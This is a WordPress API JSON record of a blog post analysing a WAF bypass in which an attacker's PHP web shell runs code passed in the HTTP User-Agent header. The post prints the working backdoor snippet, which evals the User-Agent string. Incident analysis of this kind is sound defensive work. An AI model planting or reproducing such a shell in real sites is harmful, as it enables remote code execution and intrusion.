{"id":8,"date":"2023-11-25T22:05:55","date_gmt":"2023-11-25T22:05:55","guid":{"rendered":"https:\/\/ticklemeelmo.com\/malware\/?p=8"},"modified":"2023-11-26T05:13:07","modified_gmt":"2023-11-26T05:13:07","slug":"waf-evasion-using-http-user-agent-string","status":"publish","type":"post","link":"https:\/\/syschan.org\/malware\/waf-evasion-using-http-user-agent-string\/","title":{"rendered":"WAF Evasion Using HTTP User Agent String"},"content":{"rendered":"\n

Web application firewalls are often a first line of defense for protecting web sites from malicious actors. Unfortunately, they are not a silver bullet, and in many cases won\u2019t prevent a site from being compromised if the site contains underlying vulnerabilities.<\/p>\n\n\n\n

In the case I will describe in this post, an attacker was able to leverage a file upload vulnerability to place a PHP web shell on a victim server. However, a WAF in place was preventing the attacker from executing code through their web shell using POST or GET parameters.<\/p>\n\n\n\n

To work around this, another PHP shell was dropped, designed to execute code placed in the User Agent string of the requests made to the shell.<\/p>\n\n\n\n

The malicious code:<\/p>\n\n\n\n

<\/p>\n\n\n\n

if (eregi(\"final\",$_SERVER['HTTP_USER_AGENT'])) { \neval(str_replace('Mozilla\/5.0 (3.1.final) ','',$_SERVER['HTTP_USER_AGENT'])); die; }<\/pre>\n\n\n\n
In this case, the deployed WAF was only designed to spot potentially malicious activity in locations where user-supplied data was expected, like the values of POST and GET parameters and COOKIE variables.<\/p>\n\n\n\n
It\u2019s important to remember, however, that an attacker controls every part of the requests they make to the server \u2013 including the contents of the User Agent string.<\/p>\n\n\n\n
Final Thoughts:<\/p>\n\n\n\n
While this is not a common WAF bypass methodology in my experience, it\u2019s certainly interesting and worth being aware of.<\/p>\n","protected":false},"excerpt":{"rendered":"
Web application firewalls are often a first line of defense for protecting web sites from malicious actors. Unfortunately, they are not a silver bullet, and in many cases won\u2019t prevent a site from being compromised if the site contains underlying vulnerabilities. In the case I will describe in this post, an attacker was able to […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-8","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/posts\/8","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/comments?post=8"}],"version-history":[{"count":8,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/posts\/8\/revisions"}],"predecessor-version":[{"id":114,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/posts\/8\/revisions\/114"}],"wp:attachment":[{"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/media?parent=8"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/categories?post=8"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/syschan.org\/malware\/wp-json\/wp\/v2\/tags?post=8"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}